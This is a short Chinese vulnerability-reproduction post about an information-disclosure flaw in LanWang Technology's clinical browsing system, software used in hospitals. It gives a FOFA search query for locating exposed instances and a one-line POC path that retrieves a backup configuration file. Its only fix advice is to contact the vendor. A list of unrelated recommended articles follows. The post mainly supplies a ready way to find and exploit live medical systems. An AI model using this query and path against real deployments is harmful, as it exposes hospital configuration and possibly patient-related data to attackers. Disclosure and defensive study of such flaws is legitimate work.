【漏洞复现】蓝网科技临床浏览系统信息泄露漏洞

Nx01 产品简介

蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。

Nx02 漏洞描述

蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: title=="临床浏览"

Nx04 漏洞复现

POC:

复制代码
/config/config%20bak.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
大小曲奇(´ε` )2 小时前
使用安全继电器的急停电路设计
安全
浪裡遊2 小时前
Linux常用指令
linux·运维·服务器·chrome·功能测试
go_to_hacker2 小时前
安恒web安全春招实战
安全·web安全·网络安全·渗透测试
SugarPPig3 小时前
PowerShell 查询及刷新环境变量
服务器
EasyDSS5 小时前
视频监控从安装到优化的技术指南,视频汇聚系统EasyCVR智能安防系统构建之道
大数据·网络·网络协议·音视频
我的作业错错错5 小时前
搭建私人网站
服务器·阿里云·私人网站
rufeike5 小时前
UDP协议理解
网络·网络协议·udp
王景程6 小时前
如何测试短信接口
java·服务器·前端
江理不变情6 小时前
海思ISP调试记录
网络·接口隔离原则
微网兔子6 小时前
伺服器用什么语言开发呢?做什么用什么?
服务器·c++·后端·游戏